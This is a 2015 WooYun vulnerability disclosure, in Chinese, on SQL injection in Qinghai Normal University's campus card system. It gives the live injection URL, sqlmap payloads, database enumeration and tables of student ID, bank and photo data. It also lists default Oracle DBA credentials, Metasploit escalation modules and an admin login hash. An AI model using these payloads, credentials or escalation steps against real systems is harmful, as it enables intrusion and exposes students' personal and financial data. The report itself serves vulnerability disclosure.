当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0130250

漏洞标题:青海师范大学

相关厂商:青海师范大学

漏洞作者: DKing

提交时间:2015-07-29 18:04

修复时间:2015-08-03 18:06

公开时间:2015-08-03 18:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-29: 细节已通知厂商并且等待厂商处理中
2015-08-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

网络边界控制不当,本应只存在于内网的网页应用存在SQL注入且暴露于外网导致大量学生隐私数据泄露
包含:姓名 身份证 银行卡 个人照片 支付宝 电话 生日 密码hash 一卡通卡号 余额(目测可修改)

详细说明:

使用了存在SQLi的新开普一卡通平台(目测跟我学校的一样老),并且对挂在公网web服务器上对外开放。由此展开导致大量数据泄露

漏洞证明:

注入点
http://ecard.qhnu.edu.cn/selfsearch/Index_ShowNews.aspx?NewsCode=362
偶尔不稳定,可以间隔几分钟以后再访问


简单注入语句测试,发现默认错误页面也没改,存在注入可能性增大


直接丢进sqlmap看看
网速不好,没开多线程,枚举速度3tables/s,已经跑了十分钟。算数也不好。现在正在跑
开始大量爆表……
表太多把sqlmap最开始的回显顶没了,粘贴部分log在这里
Parameter: NewsCode (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: NewsCode=363 AND 1508=1508

Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: NewsCode=-5125 UNION ALL SELECT NULL,NULL,NULL,NULL,CHR(113)||CHR
(118)||CHR(113)||CHR(107)||CHR(113)||CHR(97)||CHR(115)||CHR(97)||CHR(117)||CHR(117)||CHR
(76)||CHR(110)||CHR(73)||CHR(116)||CHR(113)||CHR(113)||CHR(118)||CHR(122)||CHR(107)||CHR
(113),NULL,NULL FROM DUAL--

Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: NewsCode=363 AND 9723=DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||CHR
(117)||CHR(66)||CHR(122),5)
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
current user: 'CCENSE'
current schema (equivalent to database on Oracle): 'CCENSE'
current user is DBA: True

十五分钟跑完,新系统忘了开终端inf. Scrollback
还是看看log就好
大部分省略
Database: DBSNMP
[21 tables]
Database: OUTLN
[3 tables]
Database: XDB
[11 tables]
+--------------------------------+
| MIGR9202STATUS |
| XDB$CHECKOUTS |
| XDB$COLUMN_INFO |
| XDB$DXPATH |
| XDB$DXPTAB |
| XDB$H_INDEX |
| XDB$NMSPC_ID |
| XDB$PATH_ID |
| XDB$PATH_INDEX_PARAMS |
| XDB$QNAME_ID |
| XDB$ROOT_INFO |
+--------------------------------+
上面的没检出数据

Database: OLAPSYS
[126 tables]
Database: SYSTEM
[141 tables]
Database: DMSYS
[2 tables]
Database: SYS
[703 tables]
Database: MDSYS
[49 tables]
Database: SCOTT
[4 tables]
Database: TSMSYS
[1 table]
Database: EXFSYS
[44 tables]
Database: CTXSYS
[37 tables]
Database: WMSYS
[40 tables]
Database: SYSMAN
[337 tables]

Database: CCENSE
[557 tables] #没错这里不粘贴了

Database: OLAPSYS
[126 tables]

不少系统表的数据没法检出。不看了。看了也做不了什么。

然后CCENSE数据库里面有这些吸引注意力………………
BASE_CUSTOMERS
艾玛column得有四十个
OUTID | IDCARDNO | SERVERID | CARDSFID | CUSTOMERID | SUMSUBSIDY |
CERTIFICATEID | SUMSUBSIDYLOAD | SUMSUBSIDYCONSUME | SEX | VER | PWD
| JPDM | NAME | SUMQC | SUMSXF | CARDNO |
CARDSN | STATUS | NATION | OPENDT | ODDFARE | OPCOUNT | SUMFARE |
EMPCODE | SUMSAVE | SUMLOAD | COUNTRY | CARDTYPE | SUMDAIFA | QUERYPWD
| SCARDSNR | CUSTDEPT | CARDFUNC | SCANCODE | NOUSEDATE |
CARDBLOCK | SUMMNGFARE | ODDFAREACC | SUMADDFARE | IFPUSHFARE |
CURUSEDATE | SUBODDFARE | BANKCARDNO | MEDICALTYPE |
SUMDISCOUNT | REGSTARTYEAR | ISBIGFARECARD | SUBODDFAREACC |
SUMMAINCONSUME | SUMCONSUMEFARE |
记录无数,我只取50验证




其他的还有
BASE_EMP
BASE_CUSTOMERS_PHONECARD
BASE_CUSTOMERS_PHOTO
BASE_FINGERPRINT
ST_ACCOUNT_LOG |
| ST_ACCOUNT_MONTH |
| ST_ACCOUNT_MONTH_TOTAL |
| ST_ACCOUNT_STATSIGN |
| ST_ACCOUNT_YEAR |
| ST_ACCOUNT_YEAR_TOTAL |
| ST_BALANCE_AREA |
| ST_BALANCE_AREA_TOTAL |
| ST_BALANCE_CUST |
| ST_BALANCE_CUST_DAY |
| ST_BALANCE_MONTH |
| ST_BALANCE_MONTH_TOTAL |
| ST_BALANCE_YEAR |
| ST_BALANCE_YEAR_TOTAL |
| ST_BANK |
| ST_BANK_ACCOUNT |
| ST_BANK_BALANCE |
| ST_BANK_BALANCE_MONTH |
| ST_BANK_BALANCE_MONTH_TOTAL |
| ST_BANK_BALANCE_YEAR |
| ST_BANK_BALANCE_YEAR_TOTAL
不乱翻了
然后oracle DBA的账号密码都有了,CCENSE:CCENSE (--password开关可直接拿到,略)
此时可以加载MSF模块,自动在oracle执行java过程提权上服务器。…………我随便说说,没真做。
auxiliary/admin/oracle/post_exploitation/win32exec 2007-12-07 normal
Oracle Java execCommand (Win32)
auxiliary/admin/oracle/post_exploitation/win32upload 2005-02-10
normal Oracle URL Download
auxiliary/admin/oracle/oracle_login 2008-11-20 normal
Oracle Account Discovery
auxiliary/admin/oracle/oracle_sql 2007-12-07 normal
Oracle SQL Generic Query
给你几个模块自己体会
对不起没有精彩的内网渗透桥段
还是新系统的原因,oracle环境没装,OCI8没有
YY一下行了。真搞估计又是一片腥风血雨
搞不清关联,没敢试着写数据改金额。点到为止行了

再验证一下账户有效性。随便找个妹子的md5解开找登录点看看,对外开放的一卡通服务又作孽了。花式信息泄露
顺便吐槽一下,满是漏洞的一卡通就暴露在旧版官网首页的右下角。http://ecard.qhnu.edu.cn/selfsearch/
照片。





再顺便吐槽一下,
http://cwc.qhnu.edu.cn:88
http://cwc.qhnu.edu.cn:88/index2014.aspx
没有验证码
还有个地方的登录表单的验证码基本瞎的。顺序固定,验证不准。现在找不到url了

然后 后台
https://wlzx.qhnu.edu.cn/admin.php
账号密码
admin
5409e1c77f54f83446f1f4ec5f767773
穷啊解不起,不进了。
数据只dump了不到300KB,真实IP没马甲,水表已炸 没有快递 水管不漏水 电路不漏电 已交物业费 打死不开门

……不知道漏洞存在多久了,想想都可怕,赶快补吧……

修复方案:

………………问题多多。暂时下线修复好了。我不懂。

版权声明:转载请注明来源 DKing@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-03 18:06

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2015-07-31 18:07 | DKing ( 路人 | Rank:0 漏洞数:1 | 盲人摸象中)

    第一次上传漏洞不知道乌云会自动加换行……所以code标签也没用……求轻喷